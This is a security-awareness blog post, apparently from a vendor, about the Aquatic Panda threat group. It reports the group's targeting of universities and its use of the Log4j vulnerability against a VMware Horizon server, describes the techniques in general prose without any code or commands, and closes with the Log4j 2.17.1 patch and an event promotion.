Aquatic Panda’ security breaches help the group collect intelligence, conduct espionage, and harvest credentials. This adversary poses a significant threat, which researchers in the private sector are working to disrupt. Learn about who Aquatic Panda targets and assess whether or not your organization should upgrade systems to match these attackers’ capabilities.

Aquatic Panda targets

Aquatic Panda tends to focus on universities and collegiate institutions. Why are hackers focused on these groups? Academic institutions often house valuable data, and hackers know that it’s often quite poorly secured.

Presently, the Aquatic Panda advanced persistent threat group (APT) is leveraging the Log4j vulnerabilities to access proprietary information owned by academic institutions.

Did you miss the Log4j coverage? Click here.

What we know

The Aquatic Panda group first appeared online in 2012. According to researchers, Aquatic Panda operators primarily aim to collect intelligence and to engage in espionage. The group’s more specific objectives remain unknown.

Up until this point, Aquatic Panda has primarily targeted telecommunications firms, technology firms, and government entities. Now, educational institutions have entered the mix. Operators rely extensively on Cobalt Strike. Previous tools used in operations also include Gh0st RAT, Poison Ivy, and Torn RAT.

Why it matters

Aquatic Panda is state-sponsored and uses strategies that allow persistence in environments. This sets the stage for continuous theft of valuable data. It also enables the threat actors to spend days, weeks or months mapping out vulnerabilities and planning for a more lucrative and disruptive attack. Attack clean-up isn’t easy and can cost organizations millions of dollars.

Log4j details

Researchers have recently observed suspicious activity stemming from a specific process on a vulnerable VMWare Horizon instance. The network belonged to a large academic institution. The activities ultimately resulted in an active intrusion.

After tracking the APT actor’s operations and examining available telemetry, researchers disclosed that a modified version of the Log4j exploit was likely used amidst operations.

Technical insights

Researchers report that Aquatic Panda members leveraged a public GitHub project starting on December 13th of this year to gain access into the vulnerable instance of VMWare Horizon. The Aquatic Panda group continued reconnaissance from the host while using native OS binaries to explore exiting privilege levels, system details and domain information.

As researchers continued to trace Aquatic Panda’s behaviors, they observed use of a Base64-encoded command via PowerShell used to obtain malware from toolkits. While the attack unfolded, experts provided regular updates to the victim organization. The target implemented its incident response protocol as quickly as possible. Eventually, patching of a vulnerable application prevented further intruder activity.

In conclusion

Across the world, a series of threat actors are exploiting the Log4j vulnerabilities for criminal gain. At least a handful of experts expect to see continued threat actor use of Log4j until all organizations apply comprehensive mitigations.

For its part, Apache has just issued another security update for the Log4j logging library. As of Tuesday, the latest version of Log4j available for install on systems running Java 8 is 2.17.1. This represents the fifth vulnerability discovered since December 9th. Given all of the attention on this library, this may or may not be the final update pertaining to Log4j vulnerabilities.

To learn more about managing cyber risk in a changing world, please join us at the premiere cyber security event of the year – CPX 360 2022. Register here.